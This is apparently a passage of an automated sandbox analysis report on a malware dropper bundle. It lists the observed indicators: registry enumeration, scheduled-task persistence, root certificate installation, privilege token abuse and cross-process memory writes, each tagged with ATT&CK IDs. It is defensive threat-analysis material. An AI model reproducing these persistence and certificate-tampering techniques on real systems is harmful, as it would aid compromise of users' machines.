Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

5628 schtasks.exe
6612 schtasks.exe

pid	process
5628	schtasks.exe
6612	schtasks.exe

Enumerates system info in registry 2 TTPs 33 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

860 taskkill.exe
6088 taskkill.exe

pid	process
860	taskkill.exe
6088	taskkill.exe

Modifies data under HKEY_USERS 6 IoCs

Processes:

svchost.exemsiexec.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8	msiexec.exe

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

installer.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exeFri158ea592d6f.exeFri15364050134.exe

pid	process
3532	powershell.exe
3532	powershell.exe
3884	Fri158ea592d6f.exe
3884	Fri158ea592d6f.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe
1176	Fri15364050134.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

Processes:

381807.exe

pid process

1856 381807.exe

pid	process
1856	381807.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeFri155e6d4468.exeFri157e966e73fe.exeFri15517df7a88264b6.exe2307435.scrWerFault.exePublicDwlBrowser1100.exeUltraMediaBurner.exe6.exeFri158ea592d6f.exe8964799.scrFri15c47a7c807b12d1.exeLivelyScreenRecorderF20.exe7913749.exe8360833.exe1421519.exeEtalevzaJet.exemsedge.exe2517325.scr8014016.scr

description	pid	process
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeDebugPrivilege	4732	Fri155e6d4468.exe
Token: SeDebugPrivilege	3592	Fri157e966e73fe.exe
Token: SeCreateTokenPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeAssignPrimaryTokenPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeLockMemoryPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeIncreaseQuotaPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeMachineAccountPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeTcbPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeSecurityPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeTakeOwnershipPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeLoadDriverPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeSystemProfilePrivilege	5240	Fri15517df7a88264b6.exe
Token: SeSystemtimePrivilege	5240	Fri15517df7a88264b6.exe
Token: SeProfSingleProcessPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeIncBasePriorityPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeCreatePagefilePrivilege	5240	Fri15517df7a88264b6.exe
Token: SeCreatePermanentPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeBackupPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeRestorePrivilege	5240	Fri15517df7a88264b6.exe
Token: SeShutdownPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeDebugPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeAuditPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeSystemEnvironmentPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeChangeNotifyPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeRemoteShutdownPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeUndockPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeSyncAgentPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeEnableDelegationPrivilege	5240	Fri15517df7a88264b6.exe
Token: SeManageVolumePrivilege	5240	Fri15517df7a88264b6.exe
Token: SeImpersonatePrivilege	5240	Fri15517df7a88264b6.exe
Token: SeCreateGlobalPrivilege	5240	Fri15517df7a88264b6.exe
Token: 31	5240	Fri15517df7a88264b6.exe
Token: 32	5240	Fri15517df7a88264b6.exe
Token: 33	5240	Fri15517df7a88264b6.exe
Token: 34	5240	Fri15517df7a88264b6.exe
Token: 35	5240	Fri15517df7a88264b6.exe
Token: SeDebugPrivilege	5652	2307435.scr
Token: SeRestorePrivilege	3776	WerFault.exe
Token: SeBackupPrivilege	3776	WerFault.exe
Token: SeBackupPrivilege	3776	WerFault.exe
Token: SeDebugPrivilege	340	PublicDwlBrowser1100.exe
Token: SeDebugPrivilege	2328	UltraMediaBurner.exe
Token: SeDebugPrivilege	4660	6.exe
Token: SeDebugPrivilege	3884	Fri158ea592d6f.exe
Token: SeDebugPrivilege	2492	8964799.scr
Token: SeDebugPrivilege	5560	Fri15c47a7c807b12d1.exe
Token: SeDebugPrivilege	5600	LivelyScreenRecorderF20.exe
Token: SeDebugPrivilege	3824	7913749.exe
Token: SeDebugPrivilege	3840	8360833.exe
Token: SeDebugPrivilege	5956	1421519.exe
Token: SeDebugPrivilege	5664	EtalevzaJet.exe
Token: SeDebugPrivilege	860	msedge.exe
Token: SeDebugPrivilege	5136	2517325.scr
Token: SeDebugPrivilege	1808	8014016.scr
Token: SeIncreaseQuotaPrivilege	3532	powershell.exe
Token: SeSecurityPrivilege	3532	powershell.exe
Token: SeTakeOwnershipPrivilege	3532	powershell.exe
Token: SeLoadDriverPrivilege	3532	powershell.exe
Token: SeSystemProfilePrivilege	3532	powershell.exe
Token: SeSystemtimePrivilege	3532	powershell.exe
Token: SeProfSingleProcessPrivilege	3532	powershell.exe
Token: SeIncBasePriorityPrivilege	3532	powershell.exe
Token: SeCreatePagefilePrivilege	3532	powershell.exe

Suspicious use of FindShellTrayWindow 4 IoCs

Processes:

setup_2.tmpultramediaburner.tmpmsedge.exeinstaller.exe

pid process

1120 setup_2.tmp
6152 ultramediaburner.tmp
6040 msedge.exe
1440 installer.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

cmd.exe

pid process

5176 cmd.exe

pid	process
1120	setup_2.tmp
6152	ultramediaburner.tmp
6040	msedge.exe
1440	installer.exe

pid	process
5176	cmd.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4012 wrote to memory of 4776	4012	setup_x86_x64_install.exe	setup_installer.exe
PID 4012 wrote to memory of 4776	4012	setup_x86_x64_install.exe	setup_installer.exe
PID 4012 wrote to memory of 4776	4012	setup_x86_x64_install.exe	setup_installer.exe
PID 4776 wrote to memory of 4844	4776	setup_installer.exe	setup_install.exe
PID 4776 wrote to memory of 4844	4776	setup_installer.exe	setup_install.exe
PID 4776 wrote to memory of 4844	4776	setup_installer.exe	setup_install.exe
PID 4844 wrote to memory of 4136	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4136	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4136	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3048	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3048	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3048	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3024	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3024	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3024	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4872	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4872	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4872	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3032	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3032	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 3032	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4388	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4388	4844	setup_install.exe	cmd.exe
PID 4844 wrote to memory of 4388	4844	setup_install.exe	cmd.exe
